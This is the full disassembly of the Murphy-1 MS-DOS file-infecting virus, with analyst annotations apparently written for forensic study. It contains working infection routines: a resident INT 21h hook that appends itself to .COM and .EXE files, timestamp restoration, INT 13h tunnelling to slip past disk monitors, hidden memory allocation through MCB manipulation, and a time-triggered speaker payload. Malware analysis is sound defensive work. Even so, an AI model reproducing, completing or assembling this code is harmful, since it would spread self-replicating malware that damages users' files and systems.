MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.murphy-1.asm

; ---------------------------------------------------------------------------
; Murphy-1 -- MS-DOS COM/EXE appending file infector.  Disassembly listing with
; analyst annotations for defensive / forensic reading only: this is malware,
; and nothing below is meant to be assembled, fixed or run.
; The listing is MASM/TASM style (DUP, WORD PTR, EXTRN), not NASM despite the
; page tag.  Labels LXXXX are absolute offsets inside this carrier image:
;   0100h-08CFh  carrier host: 3 NOPs + a banner printer (its saved copy is at L08D6)
;   08D0h-0DCCh  virus body = 04FDh (1277) bytes, the size L0B1F writes
; The virus addresses its own image as if it began at offset 0100h (MOV DX,0100H
; at L0B1F; the resident copy is placed so that block:0000 == seg:0100h at
; L0D63), so every CS:[01xxH] in the resident code is a "virus-relative" offset:
;   listing address = virus-relative offset + 07D0h.
; Indicators an analyst can use: the 4B59h "are you there" probe (L0C55), the
; 1277-byte body, the strings at L010C/L08DF/L090A, and the E9 + (size-500h)
; displacement test at L0B2B.
; ---------------------------------------------------------------------------
L0100: JMP L08D0 ; carrier entry: the 3-byte JMP that L0B5B writes over a host's first bytes
MOV AH,09H ; host code at 0103h: print the banner below with INT 21h/09h ...
MOV DX,010CH
INT 21H
L010A: INT 20H ; ... and terminate.  Reached only after L0DAE restores the first 4 bytes
L010C: DB 'Murphy virus V1.00 (V1277)$' ; host banner; "V1277" matches the body size
DB 1961 DUP (1) ; filler: 0127h + 1961 = 08D0h, so the body starts exactly at L08D0
L08D0: JMP L0C51 ; virus entry (virus-relative 0100h): run the installer
NOP ; \ virus-relative 0103h..011Ah: the 24 host bytes that L09F2's path reads
NOP ; \ (MOV DX,0103H / MOV CX,0018H).  In this carrier they hold its original
NOP ; \ start: 3 NOPs + the banner printer + the first 12 bytes of its string.
L08D6: MOV AH,09H ; \
MOV DX,010CH ; > saved host bytes (same code as 0103h above)
INT 21H ; /
L08DD: INT 20H ; /
; /
L08DF: DB 'Murphy virus' ; / bytes 12..23 of the save area
L08EB: DW 2 DUP(0000H) ; virus-relative 011Bh = host's original IP, 011Dh = original CS (EXE hosts, set in L0A5B);
                       ; the COM path reuses 011Bh as scratch for the 3-byte JMP (L0B5B)
; The "instructions" below are a disassembler's rendering of the virus DATA
; area; no code jumps here.  Slot map (virus-relative = listing - 07D0h):
;   011Fh        virus CS paragraph relative to the load segment (set in L0A5B, read at L0D87)
;   0121h/0123h  host file time / date (saved after L09F2, restored at L0A35)
;   0125h/0127h  host's old header words +02h/+04h (saved in L0A5B, not read back in this listing)
;   0129h:012Bh  original INT 21h vector (captured at L0C5F, called by L0B7F and L0A56)
;   012Dh:012Fh  INT 24h vector saved by L0B86
;   0131h:0133h  INT 13h entry recorded at install (L0C5F, overwritten at L0CE7 by the ROM scan)
;   0135h:0137h  INT 13h vector saved by L0B86
; The byte values are residue from whatever system this sample was dumped on
; (e.g. 0129h = 0CA8h:02B5h for INT 21h, 0131h = C800h:01EAh, which is
; consistent with a ROM-extension INT 13h found by the scan at L0CB1).
MOV WORD PTR [DI],0040H ;DB 0C7H,25H,40H,00H  -> 011Fh = 25C7h, 0121h = 0040h
AND [BX+SI],AX ;DB 21H,00H  -> 0123h = 0021h
JNO L08F7 ;DB 71H,00H  -> 0125h = 0071h
L08F7: XOR AL,[BX+DI] ;DB 32H,01H  -> 0127h = 0132h
MOV CH,02H ;DB 0B5H,02H  -> 0129h = 02B5h (INT 21h offset)
TEST AL,0CH ;DB 0A8H,0CH  -> 012Bh = 0CA8h (INT 21h segment)
PUSH SI ;DB 56H  -> low byte of 012Dh
ADD AX,0AF9H ;DB 05H,0F9H,0AH  -> 012Dh = 0556h, 012Fh = 0AF9h (INT 24h)
EXTRN L3BC8H_0001H:FAR ; disassembler artifact produced by decoding the data bytes below as a far JMP; not code
JMP L3BC8H_0001H ;DB 0EAH,01H,00H,0C8H,3BH  -> 0131h = 01EAh, 0133h = C800h, low byte of 0135h
ADD CH,[BX+SI+200CH] ; DB 02H,0A8H,0CH,20H  -> 0135h = 023Bh, 0137h = 0CA8h
L090A: DB 'Hello, I'm Murphy. Nice to meet you friend. ' ; author strings, 127 bytes total, never displayed by this code;
DB 'I'm written since Nov/Dec.' ; they end at 0989h = virus-relative 01B9h, the unlabelled
DB ' Copywrite (c)1989 by Lubo & Ian, Sofia, USM Laboratory. ' ; INT 21h handler entry that L0D63 installs
; ******** INT21 DRIVER ********
; Resident INT 21h handler.  Its entry is the CALL below (virus-relative 01B9h,
; the offset L0D63 stores into the vector; the listing gives it no label because
; the string at L090A runs straight into it).  On every DOS call it:
;   1. runs the time-triggered payload check (L0C1B);
;   2. answers the 4B59h "are you there" probe from L0C55 with CF=0;
;   3. for EXEC (AH=4Bh), open-for-read (AX=3D00h) and the DOS 4 extended open
;      (AX=6C00h with BL=0) tries to infect the named .COM/.EXE file;
;   4. chains to the original vector saved in slot 0129h with the caller's
;      registers intact.
CALL L0C1B ; SOUND SHOW: payload trigger check on every DOS call (L0C1B preserves AX,CX,DX,DS)
CMP AX,4B59H ; SPECIAL FUNCTION ? -- installation probe
JNE L099A
PUSH BP ; \ stack: BP, IP, CS, FLAGS -> [BP+06H] is the caller's FLAGS image
MOV BP,SP ; \
AND WORD PTR [BP+06H],-02H ; > FLAG C = 0 : "already resident" answer for the probing copy
POP BP ; /
IRET ; /
L099A: CMP AH,4BH ; EXEC PROGRAM ? (any AL subfunction)
JE L09B1
CMP AX,3D00H ; OPEN FILE, read-only access mode only (AL=0)
JE L09B1
CMP AX,6C00H ; OPEN FILE ( MS DOS v4.xx extended open; name pointer is DS:SI )
JNE L09AE
CMP BL,00H ; only when the open mode BL is 0
JE L09B1
L09AE: JMP L0A56 ; NO. ORIGINAL INT21
L09B1: PUSH ES ; \
PUSH DS ; > SAVE REGISTERS
L09B3: DB 'WVURQSP' ; / = PUSH DI,SI,BP,DX,CX,BX,AX hidden as string bytes (mirrored by L0A4D)
CALL L0B86 ; SET NEW INT24 & INT13: silence critical errors and bypass INT 13h hooks while writing
CMP AX,6C00H ; \
JNE L09C4 ; > MS DOS v4.xx NAME -> DS:SI, so move the pointer to DX
MOV DX,SI ; /
L09C4: MOV CX,0080H ; look at most 128 bytes for the terminating NUL
MOV SI,DX ; \
L09C9: INC SI ; \ (scan starts at DX+1, so a name that is empty is not handled)
MOV AL,[SI] ; > SEARCH EXTENSION
OR AL,AL ; /
LOOPNZ L09C9 ; /
SUB SI,+02H ; SI -> last two characters of the name
CMP WORD PTR [SI],4D4FH ; 'OM' ? (uppercase compares only: lowercase names are left alone)
JE L09EB
CMP WORD PTR [SI],4558H ; 'XE' ?
JE L09E2
L09DF: JMP SHORT L0A4A ; neither .COM nor .EXE: restore and chain
NOP
L09E2: CMP WORD PTR [SI-02H],452EH ; '.E' ? (completes ".EXE"; the original listing's comment had .C/.E swapped)
JE L09F2
JMP SHORT L09DF
L09EB: CMP WORD PTR [SI-02H],432EH ; '.C' ? (completes ".COM")
JNE L09DF
L09F2: MOV AX,3D02H ; OPEN FILE read/write, issued through L0B7F (original DOS entry)
CALL L0B7F
JB L0A4A ; open failed: give up silently (nothing clears a read-only attribute, so such hosts are presumably skipped)
MOV BX,AX ; handle
MOV AX,5700H ; GET DATE & TIME
CALL L0B7F
MOV CS:[0121H],CX ; SAVE DATE & TIME in slots 0121h/0123h so the stamp can be put back after writing
MOV CS:[0123H],DX
MOV AX,4200H ; seek to offset 0 (CX:DX = 0, from start)
XOR CX,CX
XOR DX,DX
CALL L0B7F
PUSH CS ; MY SEGMENT: DS=CS so the 0103h buffer and L0B1F's 0100h source are virus-relative
POP DS
MOV DX,0103H ; READ ORIGINAL 24 BYTES of the host into the save area at virus-relative 0103h
MOV SI,DX
MOV CX,0018H
MOV AH,3FH
CALL L0B7F
JB L0A35 ; read failed: restore the stamp and close
CMP WORD PTR [SI],5A4DH ; 'MZ' signature ? -> EXE path; anything else is treated as a COM image
JNE L0A32
CALL L0A5B ; INFECT 'EXE' FILE
JMP SHORT L0A35
L0A32: CALL L0B2B ; INFECT 'COM' FILE
L0A35: MOV AX,5701H ; SET ORIGINAL DATE & TIME (defeats timestamp-based change detection)
MOV CX,CS:[0121H]
MOV DX,CS:[0123H]
CALL L0B7F
MOV AH,3EH ; CLOSE FILE
CALL L0B7F
L0A4A: CALL L0BC3 ; RESTORE INT13 & INT24
L0A4D: DB 'X[YZ]^_' ; RESTORE REGISTERS = POP AX,BX,CX,DX,BP,SI,DI (exact reverse of L09B3)
POP DS
POP ES
L0A56: JMP DWORD PTR CS:[0129H] ; ORIGINAL INT21: the caller's request is then serviced normally
; ******** INFECT 'EXE' PROGRAM ********
; Entry: BX = handle opened read/write, DS = CS, SI = 0103h -> the host's first
; 24 header bytes.  MZ fields touched: +02h bytes in last page, +04h pages,
; +08h header paragraphs, +0Ch max alloc, +14h IP, +16h CS.
; Appends the 1277-byte body at EOF and repoints the header entry CS:IP at its
; first byte; the original CS:IP is kept in slots 011Bh/011Dh for L0D87.
; Every path returns with RET; the two PUSHes are rebalanced before each exit.
L0A5B: MOV CX,[SI+16H] ; CS SEGMENT (header initial CS)
ADD CX,[SI+08H] ; + HEADER SIZE in paragraphs
MOV AX,0010H ; PARA -> BYTES
MUL CX
ADD AX,[SI+14H] ; DX:AX = START FILE: file offset of the current entry point
ADC DX,+00H
PUSH DX ; SAVE START FILE OFFSET
PUSH AX
MOV AX,4202H ; MOVE FP TO END FILE
XOR CX,CX ; (GET FILE SIZE) -> DX:AX
XOR DX,DX
CALL L0B7F
CMP DX,+00H ; SIZE < 1277 ? too small, quit
JNE L0A88
CMP AX,04FDH
NOP ; (a NOP follows every 04FDh immediate in this listing -- likely an assembler artifact)
JNB L0A88
POP AX ; QUIT: drop the saved entry offset
POP DX
JMP L0B0D
L0A88: MOV DI,AX ; SAVE FILE SIZE in BP:DI
MOV BP,DX
POP CX ; CALC CODE SIZE = file size - entry offset (DX:AX)
SUB AX,CX
POP CX
SBB DX,CX
CMP WORD PTR [SI+0CH],+00H ; max-alloc 0 (image loads at the top of memory): leave it alone
JE L0B0D
CMP DX,+00H ; CODE SIZE = 1277 exactly -> entry point sits 1277 bytes before EOF,
JNE L0AA3 ; taken as "already infected" (the only re-infection test for EXE hosts)
CMP AX,04FDH
NOP
JE L0B0D
L0AA3: MOV DX,BP ; FILE SIZE
MOV AX,DI
PUSH DX ; SAVE FILE SIZE
PUSH AX
ADD AX,04FDH ; CALC NEW FILE SIZE = old + 1277
NOP
ADC DX,+00H
MOV CX,0200H ; CALC FILE SIZE FOR HEADER: AX = 512-byte pages, DX = bytes in the last page
DIV CX
LES DI,DWORD PTR [SI+02H] ; SAVE OLD +02h/+04h words to slots 0125h/0127h (not read back anywhere in this listing)
MOV CS:[0125H],DI
MOV CS:[0127H],ES
MOV [SI+02H],DX ; SAVE NEW CODE SIZE: bytes in last page
CMP DX,+00H
JE L0ACB
INC AX ; round the page count up
L0ACB: MOV [SI+04H],AX ; pages in file
POP AX ; RESTORE ORIGINAL FILE SIZE
POP DX
CALL L0B0E ; DX:AX -> AX = paragraphs, DX = byte offset inside that paragraph
SUB AX,[SI+08H] ; minus header paragraphs = virus CS relative to the load segment
LES DI,DWORD PTR [SI+14H] ; SAVE OLD CS:IP in slots 011Bh (IP) / 011Dh (CS)
MOV DS:[011BH],DI
MOV DS:[011DH],ES
MOV [SI+14H],DX ; SET NEW CS:IP: entry lands on the first byte of the appended body (the JMP at L08D0)
MOV [SI+16H],AX
MOV WORD PTR DS:[011FH],AX ; SAVE OFFSET (relative CS) for the return-to-host arithmetic at L0D87
MOV AX,4202H ; MOVE FP TO END FILE
XOR CX,CX
XOR DX,DX
CALL L0B7F
CALL L0B1F ; WRITE CODE: 1277 bytes appended
JB L0B0D ; write failed: header left untouched (a partial tail may remain on disk)
MOV AX,4200H ; MOVE FP TO BEGIN FILE
XOR CX,CX
XOR DX,DX
CALL L0B7F
MOV AH,40H ; WRITE HEADER: the patched 24 bytes only; the checksum word (+12h) is never recomputed
MOV DX,SI
MOV CX,0018H
CALL L0B7F
L0B0D: RET
; Convert a 32-bit byte count in DX:AX to paragraphs.
; Out: AX = (DX:AX) >> 4 (low 16 bits), DX = original AX & 0Fh (byte offset
; within the paragraph).  Clobbers CX, DI, flags.  L0A5B uses it to turn the
; host's file size into the appended body's CS:IP.
L0B0E: MOV CX,0004H ; shift DX:AX right by 4
MOV DI,AX
AND DI,+0FH ; keep the low nibble before it is shifted out
L0B16: SHR DX,1
RCR AX,1
LOOP L0B16
MOV DX,DI
RET
; Write the virus body to the handle in BX at the current file position.
; Assumes DS = CS (set before the 24-byte read in the INT 21h handler); source
; DS:0100h is the first byte of the image, length 04FDh = 1277 bytes.
; Tail-jumps into L0B7F, so CF from the original INT 21h is returned to the caller.
L0B1F: MOV AH,40H ; WRITE VIRUS CODE
MOV CX,04FDH ; SIZE = 1277
NOP
MOV DX,0100H
JMP SHORT L0B7F
NOP
; ******** INFECT 'COM' PROGRAM ********
; Entry: BX = handle, DS = CS, SI = 0103h -> the host's first 24 bytes.
; Appends the body at EOF and overwrites the host's first 3 bytes with a near
; JMP to it.  The original bytes stay in the 0103h save area, which travels
; inside the appended copy and is put back by L0DAE at run time.
L0B2B: MOV AX,4202H ; MOVE FP TO END FILE
XOR CX,CX
XOR DX,DX
CALL L0B7F
CMP AX,04FDH ; FILE SIZE < 1277 ? skip
NOP
JB L0B7E
CMP AX,0FAE2H ; FILE SIZE > 64226 ? skip.  NOTE(review): 0FAE2h + 04FDh = 0FFDFh, so hosts near
NOP ; the limit may no longer fit a 64 KB COM segment after infection -- not verified
JNB L0B7E
PUSH AX ; SAVE SIZE
CMP BYTE PTR [SI],0E9H ; host already starts with a near JMP ?
JNE L0B53
SUB AX,0500H ; expected displacement = (size - 1277) - 3, i.e. what L0B5B would have written
NOP
CMP AX,[SI+01H] ; FILE IS INFECTED ? (an uninfected host whose own JMP happens to match is also skipped)
JNE L0B53
POP AX
JMP SHORT L0B7E
L0B53: CALL L0B1F ; WRITE VIRUS CODE
JNB L0B5B
POP AX ; ERROR: body write failed, the host's entry is left untouched
JMP SHORT L0B7E
L0B5B: MOV AX,4200H ; MOVE FP TO BEGIN FILE
XOR CX,CX
XOR DX,DX
CALL L0B7F
POP AX ; CALC OFFSET FOR JUMP: target 0100h + old size, displacement = old size - 3
SUB AX,0003H
MOV DX,011BH ; DATA AREA: slot 011Bh reused as a 3-byte scratch buffer
MOV SI,DX
MOV BYTE PTR CS:[SI],0E9H ; SAVE JUMP CODE TO AREA
MOV CS:[SI+01H],AX
MOV AH,40H ; WRITE FIRST 3 BYTES: E9 lo hi over the host's entry point
MOV CX,0003H
CALL L0B7F
L0B7E: RET
; ******** VIRUS INT21 ********
; Invoke the original INT 21h (vector saved in slot 0129h at install) directly,
; bypassing the virus's own hook and any hook installed above it afterwards.
; PUSHF + far CALL mimics an INT; DOS's returned flags (CF) reach the caller.
L0B7F: PUSHF
CALL DWORD PTR CS:[0129H]
RET
; ******** SET NEW INT24 & INT13 ********
; Called before each infection attempt (L09B1 path).  With DS = 0 it saves and
; replaces two interrupt vectors:
;   INT 24h (0:0090h) -> CS:0418h = L0BE8, so a critical error (write-protected
;            disk and the like) fails the DOS call quietly instead of prompting;
;   INT 13h (0:004Ch) -> the BIOS entry recorded in slot 0131h at install time,
;            so resident INT 13h monitors do not observe the writes.
; Preserves AX, DS, ES.  L0BC3 reverses both changes.
L0B86: PUSH AX ; SAVE REGISTERS
PUSH DS
PUSH ES
XOR AX,AX ; SEGMENT AT VECTOR TABLE
PUSH AX
POP DS
CLI
LES AX,DWORD PTR DS:[0090H] ; \
MOV WORD PTR CS:[012DH],AX ; > GET ADDRESS INT24 -> slots 012Dh:012Fh
MOV CS:[012FH],ES ; /
MOV AX,0418H ; \ virus-relative 0418h = L0BE8
MOV WORD PTR DS:[0090H],AX ; > SET NEW INT24
MOV DS:[0092H],CS ; /
LES AX,DWORD PTR DS:[004CH] ; \
MOV WORD PTR CS:[0135H],AX ; > GET ADDRESS INT13 -> slots 0135h:0137h
MOV CS:[0137H],ES ; /
LES AX,DWORD PTR CS:[0131H] ; \ value stored by L0C5F / L0CE7 (ROM entry when the scan succeeded)
MOV WORD PTR DS:[004CH],AX ; > SET NEW INT13
MOV DS:[004EH],ES ; /
STI
POP ES ; RESTORE REGISTERS
POP DS
POP AX
RET
; ******** RESTORE INT24 & INT13 ********
; Counterpart of L0B86, called at L0A4A once the file is closed: writes the
; saved INT 24h (slots 012Dh:012Fh) and INT 13h (slots 0135h:0137h) vectors
; back into the IVT.  Preserves AX, DS, ES.
L0BC3: PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; DS = vector table segment
PUSH AX
POP DS
CLI
LES AX,DWORD PTR CS:[012DH] ; \
MOV WORD PTR DS:[0090H],AX ; > RESTORE INT24
MOV DS:[0092H],ES ; /
LES AX,DWORD PTR CS:[0135H] ; \
MOV WORD PTR DS:[004CH],AX ; > RESTORE INT13
MOV DS:[004EH],ES ; /
STI
POP ES
POP DS
POP AX
RET
; ******** INT24 (CRITICAL ERROR) HANDLER ********
; The original listing labels this "INT13 DRIVER", but it is the routine L0B86
; installs into INT 24h (virus-relative 0418h = L0BE8).  DOS sets bit 7 of AH
; for non-disk critical errors; those are chained to the saved handler in slot
; 012Dh.  A disk error never reaches the "Abort, Retry, Ignore" prompt: the
; 3-word return frame to DOS is discarded and the next nine words are popped as
; AX,BX,CX,DX,SI,DI,BP,DS,ES -- the order the documented INT 24h stack layout
; gives for the registers of whoever issued the DOS call (note it is NOT the
; push order of L09B3, so this is DOS's frame being unwound, not the virus's) --
; which leaves that caller's IP/CS/FLAGS on top.  CF is set in the FLAGS image
; and IRET resumes the caller of the DOS call with a failed-call result; for
; this virus that is the return point inside L0B7F.  Verify the frame layout
; against the DOS version targeted.
L0BE8: TEST AH,80H ; non-disk error (bit 7 set) ?
JE L0BF2 ; bit 7 clear -> disk error: abort the DOS call silently
JMP DWORD PTR CS:[012DH] ; YES: chain to the original INT 24h
L0BF2: ADD SP,+06H ; drop DOS's return IP/CS/FLAGS
L0BF5: DB 'X[YZ^_]' ; POP AX,BX,CX,DX,SI,DI,BP hidden as string bytes
POP DS
POP ES
PUSH BP ; stack now: BP, IP, CS, FLAGS of the DOS-call issuer
MOV BP,SP
OR WORD PTR [BP+06H],+01H ; FLAG C=1 in that FLAGS image
POP BP
IRET ; resume the issuer with CF set
; ******** SOUND DRIVER *********
; Payload: start a continuous tone on the PC speaker.  Programs PIT channel 2
; (command B6h on port 43h: channel 2, lo/hi byte access, square wave) with
; divisor 0064h = 100 written low byte first (about 11.9 kHz assuming the
; standard 1.193 MHz PIT clock), then sets bits 0-1 of port 61h (timer gate and
; speaker enable).  Nothing in this listing ever clears those bits, so the tone
; persists once triggered.  Clobbers AX.
L0C07: MOV AL,0B6H
OUT 43H,AL
MOV AX,0064H
OUT 42H,AL ; divisor low byte (64h)
MOV AL,AH
OUT 42H,AL ; divisor high byte (00h)
IN AL,61H
OR AL,03H
OUT 61H,AL
RET
; ******** SHOW DRIVER ********
; Trigger check, run from the INT 21h handler on every DOS call.  Reads the
; BIOS tick counter at 0040:006Ch (DX:AX, ticks since midnight at ~18.2/s)
; and divides by 0FFFFh (~1 hour); when the quotient is 0Ah it calls L0C07,
; i.e. roughly between 10:00 and 11:00.  DX < 0FFFFh always holds, so the
; DIV cannot fault.  Preserves AX, CX, DX, DS; flags are clobbered.
L0C1B: PUSH AX ; SAVE REGISTERS
PUSH CX
PUSH DX
PUSH DS
XOR AX,AX ; DOS AREA SEGMENT (BIOS data area addressed as 0000:04xx)
PUSH AX
POP DS
MOV AX,WORD PTR DS:[046CH] ; GET TIME: 0040:006Ch tick count, low word
MOV DX,DS:[046EH] ; high word
MOV CX,0FFFFH ; DIVIDE BY 65535
DIV CX ; 1 HOUR ~ 65535 TICKS -> AX = hours since midnight
CMP AX,000AH ; TEN HOUR ?
JNE L0C37
CALL L0C07 ; SHOW: start the speaker tone
L0C37: POP DS ; RESTORE REGISTERS
POP DX
POP CX
POP AX
RET
; DX:AX = AX * 16 -- segment value to 20-bit linear address (used by L0D25 to
; compare the new MCB's address with the PSP's memory-top field).  Clobbers flags.
L0C3C: MOV DX,0010H ; DX:AX = AX * 16
MUL DX
RET
; Zero every general register except SP before control is handed to the host
; (called from both exits of L0D87), so the host sees the same clean register
; state DOS would give it.
L0C42: XOR AX,AX
XOR BX,BX
XOR CX,CX
XOR DX,DX
XOR SI,SI
XOR DI,DI
XOR BP,BP
RET
; ******** INSTALLER ********
; Reached from L08D0 in every infected host.  The CALL below pushes its own
; return address; after POP SI (L0C5F) the code addresses the image relative to
; SI/DI with negative constants, so it works wherever the body was appended:
;   SI - 0385h            = first byte of the body (virus-relative 0100h)
;   SI + 0FCACh (-0354h)  = slot 0131h (INT 13h entry)
;   SI + 0FCA4h (-035Ch)  = slot 0129h (INT 21h vector)
; In this carrier SI = 0C55h, so those land at 08D0h, 0901h and 08F9h.
L0C51: PUSH DS ; DS = PSP at entry; L0D87 pops it back for the host
CALL L0C55 ; PUSH ADDRESS of L0C55 (self-locating call)
L0C55: MOV AX,4B59H ; I'M IN MEMORY ? -- a resident copy answers CF=0 (INT 21h handler);
INT 21H ; plain DOS rejects 4B59h as an EXEC subfunction and returns CF=1
L0C5A: JB L0C5F ; NO. INSERT CODE
JMP L0D87 ; START FILE: already resident, just run the host
L0C5F: POP SI ; POP MY ADDRESS
PUSH SI ; keep it on the stack for L0D87
MOV DI,SI
XOR AX,AX ; DS = VECTOR TABLE SEGMENT
PUSH AX
POP DS
LES AX,DWORD PTR DS:[004CH] ; GET INT13 ADDRESS (whatever is in the vector now, monitor or BIOS)
MOV CS:[SI+0FCACH],AX ; -> slot 0131h:0133h (replaced below if the ROM scan finds the BIOS entry)
MOV CS:[SI+0FCAEH],ES
LES BX,DWORD PTR DS:[0084H] ; GET INT21 ADDRESS
MOV CS:[DI+0FCA4H],BX ; -> slot 0129h:012Bh, used by L0B7F and L0A56
MOV CS:[DI+0FCA6H],ES
; --- INT 13h tunnelling: locate the ROM BIOS disk entry so writes bypass hooks ---
MOV AX,WORD PTR DS:[0102H] ; SEGMENT OF INT40 (the floppy handler moves there when a hard-disk BIOS is present)
CMP AX,0F000H ; IN ROM BIOS ?
JNE L0CF4 ; NO. NOT HARD DISK IN SYSTEM -> keep the current vector
MOV DL,80H ; default scan length: 80h blocks x 512 = 64 KB (see the SHL below)
MOV AX,WORD PTR DS:[0106H] ; SEGMENT OF INT41 (hard-disk parameter table pointer)
CMP AX,0F000H ; ROM BIOS ?
JE L0CB1 ; yes: scan the whole F000h segment
CMP AH,0C8H ; below the option-ROM area (C800h..F3FFh) ?
JB L0CF4
CMP AH,0F4H ; above it ?
JNB L0CF4
TEST AL,7FH ; segment must be a multiple of 80h (2 KB boundary)
JNE L0CF4
MOV DS,AX
CMP WORD PTR DS:[0000H],0AA55H ; option-ROM signature bytes 55h AAh ?
JNE L0CF4
MOV DL,DS:[0002H] ; ROM length in 512-byte blocks
L0CB1: MOV DS,AX ; segment to scan
XOR DH,DH
MOV CL,09H
SHL DX,CL ; bytes to scan; DL = 80h wraps to 0, and LOOP with CX = 0 runs 65536 times
MOV CX,DX
XOR SI,SI
L0CBD: LODSW ; pattern 1: 80 FA 80 73 ?? CD 40 = CMP DL,80h / JAE short / INT 40h
CMP AX,0FA80H
JNE L0CCB
LODSW
CMP AX,7380H
JE L0CD6
JNE L0CE0
L0CCB: CMP AX,0C2F6H ; pattern 2: F6 C2 80 75 ?? CD 40 = TEST DL,80h / JNZ short / INT 40h
JNE L0CE2
LODSW
CMP AX,7580H
JNE L0CE0
L0CD6: INC SI ; skip the jump displacement byte
LODSW
CMP AX,40CDH ; INT 40h ?
JE L0CE7
SUB SI,+03H
L0CE0: DEC SI ; rewind so the scan advances exactly one byte per iteration
DEC SI
L0CE2: DEC SI
LOOP L0CBD
JMP SHORT L0CF4 ; not found: slot 0131h keeps the current vector
L0CE7: SUB SI,+07H ; start of the 7-byte pattern = the ROM's INT 13h floppy/hard-disk dispatch
MOV CS:[DI+0FCACH],SI ; -> slot 0131h:0133h, installed into the IVT by L0B86 during infections
MOV CS:[DI+0FCAEH],DS
; --- carve a hidden 50h-paragraph block at the top of memory and go resident ---
; Technique: free the program's own block, learn the largest free size, re-grow
; the block to everything but 51h paragraphs, and claim the remainder as a
; block owned by "0008h" that is then cut off from the MCB chain, so neither
; DOS nor memory-listing tools show it.  Any DOS error here is not checked.
L0CF4: MOV AH,62H ; TAKE 'PSP' SEGMENT -> BX
INT 21H
L0CF8: MOV ES,BX ; FREE MY BLOCK: release the program's own block ...
MOV AH,49H
INT 21H
L0CFE: MOV BX,0FFFFH ; GET BLOCK SIZE: ... then over-ask so BX returns the largest free size
MOV AH,48H
INT 21H
L0D05: SUB BX,0051H ; FREE SPACE ? need 50h paragraphs for the body + 1 for its MCB
JB L0D87 ; no: run the host without going resident
MOV CX,ES ; CALC NEW BLOCK SIZE: CX = ES + BX + 1 = data segment just above the new MCB
STC
ADC CX,BX
MOV AH,4AH ; SET NEW SIZE: re-grow the program block to BX paragraphs
INT 21H
L0D14: MOV BX,0050H
NOP
STC
SBB ES:[0002H],BX ; PSP top-of-memory segment -= 51h so the host never counts the reserved area
PUSH ES ; keep the PSP segment
MOV ES,CX
MOV AH,4AH ; resize the block at CX (MCB at CX-1, presumably the free remainder) to 50h paragraphs = 1280 bytes
INT 21H
L0D25: MOV AX,ES
DEC AX
MOV DS,AX ; DS = that block's MCB
MOV WORD PTR DS:[0001H],0008H ; owner field = 0008h, i.e. it appears DOS-owned
CALL L0C3C ; DX:AX = linear address of the MCB
MOV BX,AX
MOV CX,DX
POP DS ; DS = PSP
MOV AX,DS
CALL L0C3C
ADD AX,DS:[0006H] ; linear PSP + PSP:06h (the "bytes available in segment" word)
ADC DX,+00H
SUB AX,BX ; does that extend past the new MCB ?
SBB DX,CX
JB L0D4E
SUB DS:[0006H],AX ; yes: trim it by the overshoot
L0D4E: MOV SI,DI ; copy the body: DS:SI = first byte of the image (DI - 385h) ...
XOR DI,DI ; ... to ES:0000 in the new block
PUSH CS
POP DS
SUB SI,0385H
MOV CX,04FDH ; 1277 bytes ...
NOP
INC CX ; ... plus one (the first byte of the DW at L0DCD comes along)
REPZ MOVSB
MOV AH,62H ; PSP segment again
INT 21H
L0D63: DEC BX ; the program's own MCB
MOV DS,BX
MOV BYTE PTR DS:[0000H],5AH ; 'Z' = last block in chain: the chain now ends below the virus block
MOV DX,01B9H ; virus-relative offset of the INT 21h handler (the CALL right after L090A)
XOR AX,AX
PUSH AX
POP DS ; DS = vector table
MOV AX,ES
SUB AX,0010H ; handler segment = block - 10h, so block:0000 is addressed as seg:0100h
MOV ES,AX
CLI
MOV DS:[0084H],DX ; hook INT 21h -> ES:01B9h
MOV DS:[0086H],ES
STI
DEC BYTE PTR DS:[047BH] ; BIOS data area 0040:007Bh (documented as the LPT4 time-out byte); purpose unclear -- TODO confirm
; ******** RETURN TO HOST ********
; Reached with the self-locating return address on the stack and, beneath it,
; the DS pushed at L0C51 (= PSP).  COM vs EXE is decided from the saved header
; bytes (slot 0103h = SI+0FC7Eh); control then goes to the host's original
; entry with the general registers zeroed by L0C42.
L0D87: POP SI
CMP WORD PTR CS:[SI+0FC7EH],5A4DH ; 'MZ' in the saved 24 bytes ?
JNE L0DAE
POP DS ; EXE host: DS = PSP
MOV AX,CS:[SI+0FC9AH] ; slot 011Fh = virus CS relative to the load segment
MOV BX,CS:[SI+0FC98H] ; slot 011Dh = original header CS
PUSH CS
POP CX
SUB CX,AX ; load segment = current CS - relative CS
ADD CX,BX ; + original CS
PUSH CX ; far return target = original CS:IP
PUSH WORD PTR CS:[SI+0FC96H] ; slot 011Bh = original IP
PUSH DS ; ES = PSP as well
POP ES
CALL L0C42
RETF ; SS:SP were set by DOS from header fields +0Eh/+10h, which L0A5B never alters
L0DAE: POP AX ; COM host: discard the saved DS (CS = DS = PSP here)
MOV AX,CS:[SI+0FC7EH] ; first 4 saved bytes (slot 0103h..0106h) ...
MOV WORD PTR CS:[0100H],AX ; ... written back over the JMP that L0B5B planted
MOV AX,CS:[SI+0FC80H]
MOV WORD PTR CS:[0102H],AX
MOV AX,0100H
PUSH AX
PUSH CS
POP DS
PUSH DS
POP ES
CALL L0C42
RET ; "return" to 0100h = the restored host entry
L0DCD: DW 0000H ; trailing word just past the 1277-byte body; its first byte is included in the 04FEh-byte resident copy